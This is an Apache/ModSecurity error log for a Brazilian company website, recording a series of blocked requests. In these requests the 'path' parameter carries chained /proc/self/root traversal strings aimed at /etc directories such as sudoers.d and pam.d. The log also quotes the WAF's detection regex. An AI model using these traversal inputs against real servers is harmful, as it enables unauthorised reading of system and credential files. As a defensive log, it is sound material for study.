[Tue Mar 17 16:43:40.514083 2026] [:error] [pid 7437:tid 140411708356352] [client 74.7.241.31:54960] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmu7AeiSKl8TjouI-Yn1QAAA8Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:43:43.124529 2026] [:error] [pid 18380:tid 140411540502272] [client 74.7.241.31:54974] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmu764xEDsg_V3ESNZbjAAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:43:44.837281 2026] [core:alert] [pid 7004:tid 140411607643904] [client 74.7.241.31:54986] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/opt/lc
[Tue Mar 17 16:43:55.625847 2026] [proxy_fcgi:error] [pid 29151:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:54616] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:43:55.746780 2026] [:error] [pid 2598:tid 140411632822016] [client 74.7.241.31:35256] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmu-xj0p0SRWAqcjGGJwQAAAw0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 16:44:05.669405 2026] [:error] [pid 6296:tid 140411683178240] [client 74.7.243.128:44944] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmvBXIk7brgkOH-rIWcMQAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:44:06.349309 2026] [:error] [pid 19507:tid 140411548894976] [client 216.73.216.191:29048] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmvBtY0UrI5A3LftIwNjAAAAZc"]
[Tue Mar 17 16:44:14.392372 2026] [:error] [pid 7437:tid 140411725141760] [client 74.7.243.128:41374] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmvDgeiSKl8TjouI-Yn5gAAA8I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:44:20.133828 2026] [proxy_fcgi:error] [pid 29151:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:55248] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:44:42.062954 2026] [proxy_fcgi:error] [pid 7004:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:55778] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:45:02.230379 2026] [:error] [pid 29151:tid 140411708356352] [client 74.7.243.128:40540] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmvPvPqhzTj3BvfDX-YGQAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:45:04.142064 2026] [proxy_fcgi:error] [pid 7004:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:56278] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:45:26.077898 2026] [proxy_fcgi:error] [pid 26799:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:56706] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:45:58.122027 2026] [proxy_fcgi:error] [pid 7004:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:57410] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:46:10.232238 2026] [:error] [pid 7004:tid 140411574073088] [client 74.7.241.31:32810] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmvgsU6Sx0TG1YjmQi-0wAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:46:24.137568 2026] [proxy_fcgi:error] [pid 2473:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:57842] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:46:43.701564 2026] [:error] [pid 25836:tid 140411624429312] [client 74.7.241.31:53306] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmvo4h-PF_25v4hFRB7sQAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:46:48.129792 2026] [proxy_fcgi:error] [pid 2598:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:58322] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:46:50.031212 2026] [:error] [pid 25836:tid 140411599251200] [client 74.7.243.128:43996] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmvqoh-PF_25v4hFRB7twAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 16:47:10.131905 2026] [proxy_fcgi:error] [pid 7004:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:58748] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:47:31.133874 2026] [proxy_fcgi:error] [pid 2473:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:59240] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:47:53.129661 2026] [proxy_fcgi:error] [pid 29151:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:59704] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:48:15.130015 2026] [proxy_fcgi:error] [pid 26799:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:60172] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:48:37.049881 2026] [proxy_fcgi:error] [pid 7437:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:60672] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:48:58.045824 2026] [proxy_fcgi:error] [pid 25836:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:32876] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:49:19.121854 2026] [proxy_fcgi:error] [pid 6296:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:33346] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:49:23.741357 2026] [:error] [pid 18380:tid 140411557287680] [client 74.7.241.31:49210] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwQ64xEDsg_V3ESNZcZQAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:49:27.245847 2026] [:error] [pid 29151:tid 140411733534464] [client 74.7.241.31:36426] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwR_PqhzTj3BvfDX-YfAAAAcE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:49:41.389823 2026] [proxy_fcgi:error] [pid 26799:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:33862] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:49:43.417168 2026] [:error] [pid 7004:tid 140411658000128] [client 74.7.241.31:36456] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwV8U6Sx0TG1YjmQi_WAAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:49:45.829593 2026] [:error] [pid 7004:tid 140411632822016] [client 74.7.243.128:51582] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwWcU6Sx0TG1YjmQi_XgAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:49:52.745041 2026] [:error] [pid 2473:tid 140411725141760] [client 74.7.243.128:38946] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwYKBJNF7axNlVR0UpLAAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:50:03.142139 2026] [proxy_fcgi:error] [pid 26799:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:34346] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:50:07.463434 2026] [:error] [pid 7004:tid 140411599251200] [client 74.7.241.31:57620] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwb8U6Sx0TG1YjmQi_cgAAApE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:50:24.121777 2026] [proxy_fcgi:error] [pid 6296:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:34744] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:50:26.092958 2026] [:error] [pid 6296:tid 140411590858496] [client 74.7.241.31:33656] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwgnIk7brgkOH-rIWc8QAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:50:28.551296 2026] [:error] [pid 7004:tid 140411641214720] [client 74.7.241.31:53008] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwhMU6Sx0TG1YjmQi_dwAAAow"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:50:31.739999 2026] [:error] [pid 2473:tid 140411582465792] [client 74.7.241.31:53018] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwh6BJNF7axNlVR0UpQwAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
